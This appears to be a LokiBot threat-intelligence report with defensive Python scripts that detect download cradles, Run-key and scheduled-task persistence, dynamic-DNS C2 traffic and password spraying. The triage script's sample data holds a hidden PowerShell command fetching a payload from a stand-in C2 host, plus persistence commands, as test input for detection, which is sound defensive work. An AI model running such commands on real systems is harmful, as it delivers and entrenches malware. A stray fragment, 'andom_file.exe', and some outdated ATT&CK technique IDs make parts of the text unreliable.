James Calloway — Threat Hunter
Key Takeaways
- LokiBot leverages both phishing and exploit-based initial access methods to deploy its payloads.
- Persistent mechanisms include registry modifications and scheduled tasks, aiding long-term stealth.
- The tool employs complex C2 communication patterns for command execution and data exfiltration.
Executive Summary
During our analysis of the LokiBot malware variant, we observed a sophisticated attack chain characterized by credential theft and lateral movement within enterprise environments. This analysis outlines the step-by-step approach taken by the threat actor, from initial access to the eventual compromise of sensitive data.
Initial Access
The initial access vector employed by LokiBot is a combination of phishing campaigns and exploits targeting vulnerabilities in commonly used software. Our investigation revealed that the actor often distributes malicious attachments in emails, which, when opened, execute a PowerShell command utilizing the Invoke-WebRequest cmdlet to download the main payload from a remote server. The dropped sample typically resides in temporary directories, such as %TEMP%, hiding its presence amidst legitimate files.
andom_file.exe
Execution & Persistence
Post-execution, we noted that LokiBot employs multiple persistence mechanisms. One prevalent method involves modifying the registry at HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run, adding an entry that ensures the malware starts upon user login. Additionally, our analysis uncovered the creation of a scheduled task via the Windows Task Scheduler, further solidifying the implant’s ability to maintain access even after system reboots. This dual-layer persistence strategy highlights the actor’s foresight in ensuring their foothold remains secure.
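The two sections above describe four host-level observables: a PowerShell download cradle, a payload executing from a temporary directory, a Run-key entry, and a scheduled task pointing at that payload. The following triage script is an added example written for this page (it is not the report's own tooling) that checks Sysmon-style and Windows Security events for those observables. The events, user name, SID, host name and file names are constructed; the Run-key path and Temp locations are standard Windows paths, and the download cmdlets are real PowerShell primitives.

```python
"""Host-event triage for the persistence and download behaviours described above.
Example code for this page; all sample events are constructed."""
import re
from typing import Dict, List, Tuple

# Registry Run key (any hive prefix), typical user/system Temp locations,
# and common PowerShell download primitives.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
TEMP_PATH = re.compile(
    r"(%TEMP%|\$env:TEMP|\\AppData\\Local\\Temp\\|\\Windows\\Temp\\)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer)", re.I)

# Constructed sample events (not from the report). Field names loosely follow
# Sysmon (EventID 1 = process create, 13 = registry value set) and Windows
# Security 4698 (scheduled task created).
EVENTS: List[Dict[str, str]] = [
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell -nop -w hidden -c "Invoke-WebRequest '
                    r'http://c2.example.invalid/p.exe -OutFile $env:TEMP\payload.exe"'},
    {"EventID": "1",
     "Image": r"C:\Users\alice\AppData\Local\Temp\payload.exe",
     "CommandLine": r"C:\Users\alice\AppData\Local\Temp\payload.exe"},
    {"EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdater",
     "Details": r"C:\Users\alice\AppData\Local\Temp\payload.exe"},
    {"EventID": "4698",
     "TaskName": r"\WinUpdater",
     "TaskContent": r"<Exec><Command>C:\Users\alice\AppData\Local\Temp\payload.exe</Command></Exec>"},
    {"EventID": "1",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r"schtasks /create /sc onlogon /tn WinUpdater /tr C:\Users\alice\AppData\Local\Temp\payload.exe"},
    # Benign noise that must not fire.
    {"EventID": "1", "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"EventID": "13",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt",
     "Details": "DWORD (0x00000000)"},
]


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule this single event matches."""
    hits: List[str] = []
    eid = event.get("EventID")
    if eid == "1":
        image = event.get("Image", "")
        cmd = event.get("CommandLine", "")
        if image.lower().endswith("powershell.exe") and DOWNLOAD_CRADLE.search(cmd):
            hits.append("powershell_download_cradle")
        if TEMP_PATH.search(image):
            hits.append("execution_from_temp")
        if image.lower().endswith("schtasks.exe") and re.search(r"/create", cmd, re.I):
            hits.append("schtasks_create")
    elif eid == "13":
        if RUN_KEY.search(event.get("TargetObject", "")):
            hits.append("run_key_persistence")
            # A Run value that launches something from Temp is the stronger signal.
            if TEMP_PATH.search(event.get("Details", "")):
                hits.append("run_key_points_to_temp")
    elif eid == "4698":
        if TEMP_PATH.search(event.get("TaskContent", "")):
            hits.append("scheduled_task_from_temp")
    return hits


def triage(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Run every rule over every event; returns (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in triage(EVENTS):
        print(f"event {idx}: {rule}")
```

Each rule on its own is noisy (administrators write Run values and create tasks too); the value comes from correlating them on one host within a short window, which is why the script reports per-event rule names rather than a single verdict.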
Command and Control
Command and control (C2) communication is integral to LokiBot’s operation, and our findings indicate that the actor employs a mix of HTTP and HTTPS protocols to communicate with the C2 server, blending in with normal traffic. The malware uses dynamic DNS services to obscure the C2 infrastructure, making detection challenging. During our monitoring, we identified C2 hostnames that resolve to a changing set of IP addresses, providing the actor with an additional layer of obfuscation. The payload frequently sends HTTP POST requests containing exfiltrated data in JSON format, facilitating seamless data extraction without raising immediate alarms.
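The traffic pattern above (dynamic-DNS hostnames, a changing set of resolved IPs, repeated JSON POSTs) can be scored from ordinary proxy logs plus passive DNS data. The script below is an added example for this page, not the report's own detection content. The proxy log lines, the DNS answers and the client addresses are constructed (documentation IP ranges), the dynamic-DNS suffix list is a short illustrative sample rather than a complete feed, and the scoring weights and threshold are assumptions to be tuned locally.

```python
"""Score outbound web hosts for the C2 pattern described above.
Example code for this page; log lines and DNS answers are constructed."""
from collections import defaultdict
from typing import Dict, List

# Illustrative dynamic-DNS suffixes (assumption: production use would load a
# maintained list).
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org", "dyndns.org")

# Constructed proxy log: ts src_ip method host path status content_type bytes
PROXY_LOG = """\
2024-01-01T10:00:01Z 10.0.0.5 POST beacon-a1b2.duckdns.org /api/upload 200 application/json 512
2024-01-01T10:05:02Z 10.0.0.5 POST beacon-a1b2.duckdns.org /api/upload 200 application/json 498
2024-01-01T10:06:00Z 10.0.0.7 GET www.example.invalid /index.html 200 text/html 10240
2024-01-01T10:07:13Z 10.0.0.9 POST api.example.invalid /v1/events 200 application/json 2048
"""

# Constructed passive-DNS answers per host (documentation address ranges).
DNS_ANSWERS: Dict[str, List[str]] = {
    "beacon-a1b2.duckdns.org": ["198.51.100.4", "203.0.113.9", "192.0.2.77"],
    "www.example.invalid": ["192.0.2.10"],
    "api.example.invalid": ["198.51.100.20"],
}


def parse_line(line: str) -> Dict[str, object]:
    ts, src, method, host, path, status, ctype, size = line.split()
    return {"ts": ts, "src": src, "method": method, "host": host.lower(),
            "path": path, "status": int(status), "ctype": ctype, "bytes": int(size)}


def is_dynamic_dns(host: str) -> bool:
    h = host.lower()
    return any(h == s or h.endswith("." + s) for s in DYNAMIC_DNS_SUFFIXES)


def score_hosts(log_text: str, dns_answers: Dict[str, List[str]]) -> Dict[str, Dict[str, object]]:
    """Aggregate per destination host and attach a score with the reasons behind it."""
    per_host = defaultdict(lambda: {"json_posts": 0, "requests": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse_line(line)
        stats = per_host[r["host"]]
        stats["requests"] += 1
        if r["method"] == "POST" and str(r["ctype"]).startswith("application/json"):
            stats["json_posts"] += 1

    results: Dict[str, Dict[str, object]] = {}
    for host, stats in per_host.items():
        score, reasons = 0, []
        if is_dynamic_dns(host):                      # C2 hidden behind dynamic DNS
            score += 3; reasons.append("dynamic_dns_host")
        if stats["json_posts"] >= 2 and stats["json_posts"] == stats["requests"]:
            score += 2; reasons.append("only_json_posts")   # beacon-like, no GETs
        if len(dns_answers.get(host, [])) >= 3:      # resolves to many IPs
            score += 2; reasons.append("many_resolved_ips")
        results[host] = {"score": score, "reasons": reasons}
    return results


def suspicious_hosts(log_text: str, dns_answers: Dict[str, List[str]], threshold: int = 4) -> List[str]:
    """Hosts whose combined score reaches the (assumed) alerting threshold."""
    return sorted(h for h, r in score_hosts(log_text, dns_answers).items()
                  if int(r["score"]) >= threshold)


if __name__ == "__main__":
    for host, result in score_hosts(PROXY_LOG, DNS_ANSWERS).items():
        print(host, result)
    print("suspicious:", suspicious_hosts(PROXY_LOG, DNS_ANSWERS))
```

The threshold is deliberately above any single indicator's weight: a legitimate API that only ever receives JSON POSTs, or a CDN host with many IPs, should not alert on its own.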
Lateral Movement & Discovery
Once inside a network, LokiBot exhibits lateral movement capabilities that allow the actor to expand their reach and gather additional credentials. Utilizing the Windows Management Instrumentation (WMI) and PowerShell Remoting, the malware attempts to discover other systems on the network while harvesting user credentials via techniques such as Password Spraying and Credential Dumping. Immediate focus is often placed on high-value assets and domain controllers, amplifying the impact of the breach.
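Password spraying, mentioned above as one of the credential-harvesting techniques, leaves a characteristic trace in failed-logon records: one source trying many distinct accounts a small number of times each within a short window. The sliding-window detector below is an added example for this page, not the report's own content. The failed-logon records are constructed in the shape of Windows event 4625 (timestamp, source address, target account), and the window size, account count and per-account limit are assumptions to tune for the environment.

```python
"""Password-spray detection over constructed 4625-style failed-logon records.
Example code for this page; records and thresholds are constructed/assumed."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed records: (timestamp, source address, target account).
# 10.0.0.5 tries twelve accounts once each within ~25 seconds (spray pattern);
# 10.0.0.22 is one user mistyping their own password three times.
FAILED_LOGONS: List[Tuple[str, str, str]] = (
    [(f"2024-01-01T09:00:{i * 2:02d}", "10.0.0.5", f"user{i:02d}") for i in range(12)]
    + [("2024-01-01T09:30:00", "10.0.0.22", "carol"),
       ("2024-01-01T09:30:05", "10.0.0.22", "carol"),
       ("2024-01-01T09:30:10", "10.0.0.22", "carol")]
)


def detect_spray(events: List[Tuple[str, str, str]],
                 window: timedelta = timedelta(minutes=5),
                 min_accounts: int = 10,
                 max_per_account: int = 2) -> List[Dict[str, object]]:
    """One alert per source that, inside any `window`, fails against at least
    `min_accounts` distinct accounts with no account tried more than
    `max_per_account` times (low-and-slow per account, wide across accounts)."""
    by_src: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for ts, src, user in events:
        by_src[src].append((datetime.fromisoformat(ts), user))

    alerts: List[Dict[str, object]] = []
    for src, attempts in by_src.items():
        attempts.sort()
        start = 0
        for end in range(len(attempts)):
            # Slide the window start forward until it fits within `window`.
            while attempts[end][0] - attempts[start][0] > window:
                start += 1
            users = Counter(u for _, u in attempts[start:end + 1])
            if len(users) >= min_accounts and max(users.values()) <= max_per_account:
                alerts.append({
                    "source": src,
                    "accounts": len(users),
                    "window_start": attempts[start][0].isoformat(),
                    "window_end": attempts[end][0].isoformat(),
                })
                break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(FAILED_LOGONS):
        print(alert)
```

The per-account cap is what separates spraying from brute force: a brute-force attempt against one account trips lockout thresholds, while spraying stays under them by design, so the detector keys on breadth across accounts rather than depth on any one.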
Impact & Objectives
The overarching objective of LokiBot typically revolves around data exfiltration and credential harvesting. The collected credentials can lead to further compromises within the organization, setting the stage for subsequent attacks that could involve data encryption or identity theft. Our analysis revealed that the assets typically targeted included financial systems and personally identifiable information (PII), giving the actor both financial and strategic advantages.
MITRE ATT&CK Mapping
- T1193 – Phishing: The actor utilized phishing emails with malicious attachments to gain initial access to the network.
- T1059.001 – Command and Scripting Interpreter: PowerShell: PowerShell scripts were employed for downloading and executing the main payload.
- T1071.001 – Application Layer Protocol: Web Protocols: HTTP and HTTPS were used for C2 communication, complicating detection efforts.
- T1075 – Pass-the-Hash: Credentials harvested by LokiBot were wielded for lateral movement attempts.
Detection Opportunities
- Monitor for unusual registry modifications related to startup programs, particularly in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.
- Implement logging and monitoring for outbound HTTP/HTTPS connections, particularly to ephemeral or dynamic DNS addresses.
- Employ behavior-based detection mechanisms to identify suspicious PowerShell activity, especially command invocations that resemble credential dumping.
Analyst Notes
The intricacies of LokiBot’s operation necessitate dynamic defense strategies that encompass behavioral monitoring and network traffic analysis. As threat actors become increasingly adept at using legitimate tools for malicious purposes, our collective vigilance must evolve to counter these advanced techniques effectively.
Source: Original Report